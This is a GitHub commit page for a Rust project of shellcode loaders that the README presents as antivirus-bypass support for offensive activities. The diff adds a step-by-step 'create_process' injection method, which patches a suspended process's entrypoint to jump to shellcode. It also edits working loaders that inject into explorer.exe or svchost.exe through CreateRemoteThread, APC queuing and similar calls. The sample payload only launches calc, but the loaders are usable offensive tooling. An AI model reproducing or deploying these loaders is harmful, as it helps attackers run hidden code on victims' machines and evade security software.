Skip to content

Commit 747c8d5

Browse files
b1nhackb1nhack
committed
Updated README.md
1 parent 82d194c commit 747c8d5

11 files changed

Lines changed: 32 additions & 25 deletions

File tree

README.md

Lines changed: 19 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,9 @@
1-
# 🤖 rust-SHELLCODE 🤖
2-
1+
# 🤖 rust-shellcode 🤖
32
This project provides the underlying support for bypass av of offensive activities.
43
The available Shellcode loaders include:
54
* [asm](#asm)
65
* [create_fiber](#create_fiber)
6+
* [create_process](#create_process)
77
* [create_remote_thread](#create_remote_thread)
88
* [create_remote_thread_native](#create_remote_thread_native)
99
* [create_thread](#create_thread)
@@ -15,7 +15,6 @@ The available Shellcode loaders include:
1515
* [rtl_create_user_thread](#rtl_create_user_thread)
1616

1717
## Build
18-
1918
This is a rust project, you need install [rust](https://www.rust-lang.org/) first.
2019
Then, you can build with follow command:
2120

@@ -26,20 +25,17 @@ cargo build --release
2625
Binarys in `target/release`
2726

2827
## How to use
29-
3028
This project is just a basic demo, you need to choose the right loading method,
3129
encrypt the SHELLCODE, download the SHELLCODE from the internet,
3230
or use it with ETW patch, unhooking, etc.
3331

3432
## asm
35-
3633
SHELLCODE execute locally.
3734
1. link SHELLCODE to .text section
3835
2. inline asm using asm! macro
3936
3. call SHELLCODE
4037

4138
## create_fiber
42-
4339
SHELLCODE execute locally.
4440
1. convert current thread to fiber using `ConvertThreadToFiber`
4541
2. alloc memory using `VirtualAlloc`
@@ -48,8 +44,24 @@ SHELLCODE execute locally.
4844
5. jump SHELLCODE using `SwitchToFiber`
4945
6. jump back
5046

51-
## create_remote_thread
47+
## create_process
48+
SHELLCODE execute locally.
49+
1. create a process in `CREATE_SUSPENDED` state using `CreateProcessA`
50+
2. alloc remote memory using `VirtualAllocEx`
51+
3. copy SHELLCODE to allocated memory using `WriteProcessMemory`
52+
4. change memory permission to executable using `VirtualProtectEx`
53+
5. get `PROCESS_BASIC_INFORMATION` using `NtQueryInformationProcess`
54+
6. get `PEB` using `ReadProcessMemory`
55+
7. get `IMAGE_DOS_HEADER` using `ReadProcessMemory`
56+
8. get `IMAGE_FILE_HEADER` using `ReadProcessMemory`
57+
9. determine `IMAGE_FILE_HEADER.Machine` is x86 or x64
58+
10. get `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64]` using `ReadProcessMemory`
59+
11. let `entrypoint` = `ImageBaseAddress` + `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64].AddressOfEntryPoint`
60+
12. write a piece of assembly code to the `entrypoint` to jump to the SHELLCODE using `WriteProcessMemory`
61+
13. resume process's thread using `ResumeThread`
62+
14. close opened handle using `CloseHandle`
5263

64+
## create_remote_thread
5365
SHELLCODE execute remotely.
5466
inject `explorer.exe` by default.
5567
1. get pid by process name using crate `sysinfo`
@@ -61,14 +73,12 @@ inject `explorer.exe` by default.
6173
7. close opened handle using `CloseHandle`
6274

6375
## create_remote_thread_native
64-
6576
SHELLCODE execute remotely.
6677
inject `explorer.exe` by default.
6778
this is same with [create_remote_thread](#create_remote_thread), but without crate `windows-sys`
6879
using crate `libloading` get functions from dlls.
6980

7081
## create_thread
71-
7282
SHELLCODE execute locally.
7383
1. alloc remote memory using `VirtualAlloc`
7484
2. copy SHELLCODE to allocated memory using `std::ptr::copy`
@@ -77,13 +87,11 @@ SHELLCODE execute locally.
7787
5. waiting thread exit using `WaitForSingleObject`
7888

7989
## create_thread_native
80-
8190
SHELLCODE execute locally.
8291
this is same with [create_thread](#create_thread), but without crate `windows-sys`
8392
using crate `libloading` get functions from dlls.
8493

8594
## early_bird
86-
8795
SHELLCODE execute remotely.
8896
create and inject `svchost.exe` by default.
8997
1. create a process using `CreateProcessA`
@@ -95,7 +103,6 @@ create and inject `svchost.exe` by default.
95103
7. close opened handle using `CloseHandle`
96104

97105
## etwp_create_etw_thread
98-
99106
SHELLCODE execute locally.
100107
1. get `EtwpCreateEtwThread` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`
101108
2. alloc remote memory using `VirtualAlloc`
@@ -105,7 +112,6 @@ SHELLCODE execute locally.
105112
6. waiting thread exit using `WaitForSingleObject`
106113

107114
## memmap2_transmute
108-
109115
SHELLCODE execute locally.
110116
1. alloc memory using crate `memmap2`
111117
2. copy SHELLCODE using `copy_from_slice` function from `MmapMut` struct
@@ -114,7 +120,6 @@ SHELLCODE execute locally.
114120
5. execute fn
115121

116122
## nt_queue_apc_thread_ex_local
117-
118123
SHELLCODE execute locally.
119124
1. get `NtQueueApcThreadEx` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`
120125
2. alloc remote memory using `VirtualAlloc`
@@ -124,7 +129,6 @@ SHELLCODE execute locally.
124129
6. execute SHELLCODE using `NtQueueApcThreadEx`
125130

126131
## rtl_create_user_thread
127-
128132
SHELLCODE execute remotely.
129133
inject `explorer.exe` by default.
130134
1. get `RtlCreateUserThread` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`

create_process/src/main.rs

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@ use windows_sys::Win32::System::Threading::{
2020
#[cfg(target_os = "windows")]
2121
fn main() {
2222
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
23-
let shellcode_size: usize = shellcode.len();
23+
let shellcode_size = shellcode.len();
2424
let program = b"C:\\Windows\\System32\\calc.exe\0";
2525

2626
unsafe {
@@ -190,12 +190,14 @@ fn main() {
190190
let mut ep_buffer = vec![];
191191
match pe_header.Machine {
192192
0x8664_u16 => {
193+
// rex; mov eax
193194
ep_buffer.push(0x48_u8);
194195
ep_buffer.push(0xb8_u8);
195196
let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();
196197
ep_buffer.append(&mut shellcode_addr);
197198
}
198199
0x14c_u16 => {
200+
// mov eax
199201
ep_buffer.push(0xb8_u8);
200202
let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();
201203
ep_buffer.append(&mut shellcode_addr);
@@ -205,6 +207,7 @@ fn main() {
205207
pe_header.Machine
206208
),
207209
}
210+
// jmp [r|e]ax
208211
ep_buffer.push(0xff_u8);
209212
ep_buffer.push(0xe0_u8);
210213

create_remote_thread/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@ use windows_sys::Win32::System::Threading::{CreateRemoteThread, OpenProcess, PRO
1313
#[cfg(target_os = "windows")]
1414
fn main() {
1515
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
16-
let shellcode_size: usize = shellcode.len();
16+
let shellcode_size = shellcode.len();
1717

1818
let mut system = System::new();
1919
system.refresh_processes();

create_remote_thread_native/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ const FALSE: i32 = 0;
1515
#[cfg(target_os = "windows")]
1616
fn main() {
1717
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
18-
let shellcode_size: usize = shellcode.len();
18+
let shellcode_size = shellcode.len();
1919

2020
let mut system = System::new();
2121
system.refresh_processes();

create_thread/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ use windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};
1111
#[cfg(target_os = "windows")]
1212
fn main() {
1313
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
14-
let shellcode_size: usize = shellcode.len();
14+
let shellcode_size = shellcode.len();
1515

1616
unsafe {
1717
let addr = VirtualAlloc(

create_thread_native/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ const WAIT_FAILED: u32 = 0xFFFFFFFF;
1414
#[cfg(target_os = "windows")]
1515
fn main() {
1616
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
17-
let shellcode_size: usize = shellcode.len();
17+
let shellcode_size = shellcode.len();
1818

1919
unsafe {
2020
let kernel32 = Library::new("kernel32.dll").expect("[-]no kernel32.dll!");

early_bird/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ use windows_sys::Win32::System::Threading::{
1515
#[cfg(target_os = "windows")]
1616
fn main() {
1717
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
18-
let shellcode_size: usize = shellcode.len();
18+
let shellcode_size = shellcode.len();
1919
let program = b"C:\\Windows\\System32\\calc.exe\0";
2020

2121
unsafe {

etwp_create_etw_thread/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@ use windows_sys::Win32::System::Threading::WaitForSingleObject;
1313
#[cfg(target_os = "windows")]
1414
fn main() {
1515
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
16-
let shellcode_size: usize = shellcode.len();
16+
let shellcode_size = shellcode.len();
1717

1818
unsafe {
1919
let ntdll = LoadLibraryA(b"ntdll.dll\0".as_ptr());

memmap2_transmute/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@ use std::mem::transmute;
66
#[cfg(target_os = "windows")]
77
fn main() {
88
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
9-
let shellcode_size: usize = shellcode.len();
9+
let shellcode_size = shellcode.len();
1010

1111
let mut mmap = MmapOptions::new()
1212
.len(shellcode_size)

nt_queue_apc_thread_ex_local/src/main.rs

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@ use windows_sys::Win32::System::Threading::GetCurrentThread;
1313
#[cfg(target_os = "windows")]
1414
fn main() {
1515
let shellcode = include_bytes!("../../w64-exec-calc-shellcode-func.bin");
16-
let shellcode_size: usize = shellcode.len();
16+
let shellcode_size = shellcode.len();
1717

1818
unsafe {
1919
let ntdll = LoadLibraryA(b"ntdll.dll\0".as_ptr());

0 commit comments

Comments
 (0)